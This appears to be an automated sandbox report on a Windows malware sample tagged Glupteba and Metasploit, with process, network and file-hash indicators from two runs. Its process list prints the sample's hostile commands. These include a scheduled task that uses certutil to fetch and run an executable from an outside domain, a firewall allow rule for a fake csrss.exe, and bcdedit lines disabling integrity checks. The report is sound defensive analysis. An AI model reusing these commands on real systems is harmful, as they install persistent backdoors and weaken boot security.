Malware Analysis Report

2025-08-06 04:05

Sample ID 240121-v74klsfgd9
Target 6da0370835d68a8974fcb588fecb3fbf
SHA256 fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7
Tags glupteba metasploit backdoor dropper evasion loader trojan
Score 10/10

Table of Contents

Analysis Overview
    MITRE ATT&CK
        Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score 10/10

SHA256 fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7

Threat Level: Known bad

The file 6da0370835d68a8974fcb588fecb3fbf was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader trojan

Glupteba payload

Glupteba

MetaSploit

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Program crash

GoLang User-Agent

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-21 17:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-21 17:38

Reported

2024-01-21 17:41

Platform

win7-20231129-en

Max time kernel

0s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A (20 identical rows)

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240121173852.log C:\Windows\Logs\CBS\CbsPersist_20240121173852.cab

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /197-197

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 9c0e2ff7-2a45-47ec-97a7-2d9ce58e6af5.ninhaine.com udp
US 8.8.8.8:53 server9.ninhaine.com udp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 spolaect.info udp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp

Files

memory/3032-0-0x0000000002AF0000-0x0000000002F2D000-memory.dmp

memory/3032-1-0x0000000002AF0000-0x0000000002F2D000-memory.dmp

memory/3032-2-0x0000000002F30000-0x0000000003857000-memory.dmp

memory/3032-3-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2528-4-0x00000000028D0000-0x0000000002D0D000-memory.dmp

memory/3032-5-0x0000000000400000-0x000000000258E000-memory.dmp

memory/3032-6-0x0000000002F30000-0x0000000003857000-memory.dmp

memory/3032-7-0x0000000002AF0000-0x0000000002F2D000-memory.dmp

memory/2528-8-0x00000000028D0000-0x0000000002D0D000-memory.dmp

memory/2528-9-0x0000000000400000-0x000000000258E000-memory.dmp

\Windows\rss\csrss.exe

MD5 2c763260ff725d955728ac64dadf3958
SHA1 b335f3a6e525fd9e6ef60467160708d1c57ca545
SHA256 227a58c88ea338cf0acaa3693a545880e63fa5bd58a97f09acb1843d88df7cc4
SHA512 ff2243ef68efb03460d25aabc74883d9c972a013c5d4061aef25d8bfb8eb73a493bcd76320d61c1ce0ecfa3890373cf6c92703a1a2de26f9d2f5c3e909d70cab

C:\Windows\rss\csrss.exe

MD5 e0e462f7394a42e87d3cfa375cd94fc0
SHA1 8f9fd17b3716621d937cc8579d44b4b5672365ac
SHA256 b0193041bf4944a8ab2db47323b9a4e2d26e535cac2be88af6f23ad774a7ed99
SHA512 6db6e5386b1db8c31e1529f0e5b933b860d3c25efcc938cd22134ad32431fcc6a7ccaa3ee5c5c699c45f4a673fbbe2dffbd9b67ac7a21acf2f98956f15087d37

memory/2416-18-0x0000000002590000-0x00000000029CD000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 c26036e7be1c7717ff2e3a804b2d75a3
SHA1 a0ec868a916a4e291b783efa195424955bf11cd9
SHA256 95287ab95c5a2acc05c8a01d154de1bf719585fcbfd132416088512d74029e5b
SHA512 9f26f47f6acb614b52edcaca0d8c9123475464479c4e6dccd718963163e31b4dcaf624789fd26043f05de4893bf961a12eaa3a1f10d35bc88ae1b18bb10be8fd

\Windows\rss\csrss.exe

MD5 d23cab124d8ccf930b2d1fad102fd2a7
SHA1 0b13d0dd1c8f66ccb8cb8fb373eb6f7bbaf48781
SHA256 09be4c8472334b9ec35bf3c1b97b0a2726e527e30a92408ee1854c1bb445966e
SHA512 649b860ff48bf46f91813f7b9e0ad2d1c56610b4f0a6ef5428878cc4fdeb11d7dc6634a5f2e0b27d54504cc8955757e91aecf4581d50b2142e242d9a51d2187b

memory/2528-19-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-20-0x0000000002590000-0x00000000029CD000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 fd785bbb06ce98864a925df95e16b8c5
SHA1 03e4cc85670fc80cb6e98029645ea955fd5f2974
SHA256 6d7011d41d349a0a28428df0cc114c1ba0238c8060d2298579ccbcc22d629ebe
SHA512 f0bef8c21c154437503f02bb04e0da1381ab251c4f4b41883c3f46f77b3000f88f2208b3dfe56d76683fa6197be225d891a208c085f0a2b086be8debf0d28891

memory/2416-22-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 ee3339f6749c89218df70f883273a8a5
SHA1 b971f12080009f8de374c223fd3721528c9a8dfa
SHA256 4763e68a4c2bffa30f49b70564810915904412f53b2117df9af87a21a1873899
SHA512 71852c25b487d367f368bb39f334cc76f06a1726880e1c71071a96809cd43bdb97a2bf5da54c3f1c5225100cf0e7ddf956986c10a4fc82be32f76a4e756d7c29

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 117b6ea2c794811428fea2fc25eae383
SHA1 d5673c2832adaa659badc1baa135420fc63ae889
SHA256 a89e6c0c06c2c8fcc7620d123dc81f1bbd0915c15dfae1e5c9c45af11b446996
SHA512 52a20cd725c9ea068e6bae97c59b7716ef6fb844b578b55f16842a9006254a6e59afb25ba7dc0cdace243a576b75c10b8a910afaef526349f9892ab6631eafb3

memory/2612-41-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2612-42-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 2741c1f51b156c3cc4d8354e7ece80fd
SHA1 595ad9adb7bb5a2fa6d0ea702a929fd9e92aae24
SHA256 c4c5e8302363960a159c38d0cb1e926e6703530f6caf858d4636ca0253213adb
SHA512 490d5fb5abaa72b42603bfc2660907dee82234cb0f88760ac9496edfe9c62a3673e979c5a51dbf34da0a9be8a7a4731853f0af51e0bf52863fc55f1cd961f9c8

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 40994b10b6ae95dcef1d22c91cae0ae9
SHA1 85459e6b4eefcc0c15df157413a8fe6358dfa4d1
SHA256 7dd45d5e762f72da56a5daf0d2bf4d1dc4255dff18422bbba099f7fbabd77d08
SHA512 e593475b72fb90e3a200a13dfd9540b5f155ee4c38d95cbb0f5db197f2167c7b35911479680c6fa75b36617fcc67fe7398ce670f05d789167372ed1500c64844

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 e5fb512f3dd17d1302f02f000dfe5693
SHA1 95529fe6f04aa1039c8795d7550d1446762af009
SHA256 5381925c4a34a536ba0c2fa93d391252d91ca5d453768feec133ad547ffe3c79
SHA512 fec4d96f82b32786dbdafd075b9f940298ba8654fbfa5cb18d14078e0fd95bacb61acdc532058fc71bc46f0824c0eca242641947956495bfc4c8910aadf5dbe9

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 0791570b2d0769f0a251dde143c16bf4
SHA1 40805bacf3116e06bd0453de7484858f4e1e7e82
SHA256 7e36a77bc6ac8b20b50e036f9b59d09102027435b99874b6431b79b735b0f29f
SHA512 c431e7fd6c2603f5310ab41dcb6036fa1eb479d5c020d446dc0348bc9a3ed97d31b0046db2e073ca7832c8bfc43c9d9f8a7212959009d9215bc54877400d0c9a

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 bf78afa0bf26d0b7448b2f3a2acc32f4
SHA1 9d8ab648e689f0a6ead9878ad33d21c8829b356b
SHA256 a2148f29b2226818f37ddcc59743cefef0145defad6d4fca74210ca0ecef49dd
SHA512 71765cbd6754567987a7bbb451424e78260ad22ad159f9726746ac4db80192f51171818bd0490027bd8c2aff9fffbb3aa043e190e469518b57f97b88ca37024e

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 d71dff97ca86ca16c3db8bdb5285fb35
SHA1 271c01246897497d069b81ed37af296cf6c1e498
SHA256 4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac
SHA512 1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a

C:\Windows\Temp\Tar3597.tmp

MD5 07a8f54a0752a9853479aeb2129f599d
SHA1 02d76478c642a21356716ecdf620ec4863936b71
SHA256 fa1e7fc24766633ae74bfefa9c10c11cc788862b8cfe5f75396b20aa84a4a593
SHA512 f23bb7376ac31bdcff8a7981dfd7711702113c9159cc7e3ddda520ae0c6f35b768d30755a8e2374196b47edf906dbc6e5d1fadfb5831f263d4c557211f2ad54f

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fbb403b06bae03197b6d95bd468d8527
SHA1 09bb35f55ac81f51375a6122afe0ca4a26bf3800
SHA256 f50a04c75dc5be1b12a52cb163fd3ff176f24078f78fde575e7ecb3754e1157d
SHA512 bd35baa4ec3187d5e70d0852853bab4abde2df4a4bd5e2a2ee35399870ec616539046e0bcb92406488bc9618187ea01836e76da02750d52c28534e7b7e1e5015

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 d44640c7ac51cc9049e03edeee8b96fd
SHA1 37eb0fa6fd118d17b5455317d1ae639e7ef56251
SHA256 c5def655c89dded84a37a3dbbd84b907680f121dcd5ec20b8ef0823b34d4169b
SHA512 4a08b9c4d1908e7541457dd3cc6712c3509443a38053835943b602f2aac74c91f4c544dd0593d029d14b78a9cfcd9e3f0b638bfacfcb544fe129c76a837e1e1b

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/2416-211-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-212-0x0000000002590000-0x00000000029CD000-memory.dmp

memory/2416-216-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-217-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-218-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 f0e11df20b7732e8fa70a359cb661c23
SHA1 2d02b0d8c0c6b7bd2e1b90bfaf6e9a0d2c39a2fb
SHA256 ddcea3218320cdc914a65e9b4b2d3fcc10dd482d1fa9edce8d7d05e3457f06e5
SHA512 c8eb0d1541e8a7256030b9990a54f27314a1bda82bbe99955dc7afbaec83163d460cc9007153d60aaf2780514700f7a0ab40c7e56001f11fe3a02ffae69c94ec

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38b7eabd6a868cdfebcb09d110c67825
SHA1 7225a012527be250763f52d14250ff0556ac8a9e
SHA256 42ef174b129710297bdde703f78941a7d711aa5544751fa610fdfc413ea0bfbe
SHA512 5655e52d7506b00e40968a1131be1684d8bf09f60e87493d63ed9337f5d90d899ff198c110bbcf2bae594b6f22d126171b3dfeda4538ba456dcac7bbfe18cb41

memory/2416-271-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2416-301-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-302-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-303-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-328-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-329-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-330-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-331-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-332-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-333-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-334-0x0000000000400000-0x000000000258E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-21 17:38

Reported

2024-01-21 17:41

Platform

win10v2004-20231222-en

Max time kernel

1s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A (18 identical rows)

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe (49 identical rows)
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe (15 identical rows)

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 296

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /197-197

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll


Network


Files

C:\Windows\rss\csrss.exe

MD5 09af2a562bf25f83f51bf3699b16d5b6
SHA1 c187ffcf40d7998b46a3a9f14e1f638f8d49c5e4
SHA256 e4f27364add69769e2c783282969cb5a402357685ff2f0c935e15482b93def1b
SHA512 9e960c1c8c68cb9a36e7d544676b973c359d6373496af89d7d46a875ae0f9205de83cc8d82fd62af444f96696338ff13a36549a3cc70167dea3cb7fd7fc1e235

C:\Windows\rss\csrss.exe

MD5 a1fcc944237ba57f897d2c95bee0e044
SHA1 0bb5a4ef2ccc2bb9d41cbf7082e3cbc49b7f5e27
SHA256 3402853ea7ad2c249deac219cd7f3e535c36d5158adbfc3e4dfe1e610a36b63e
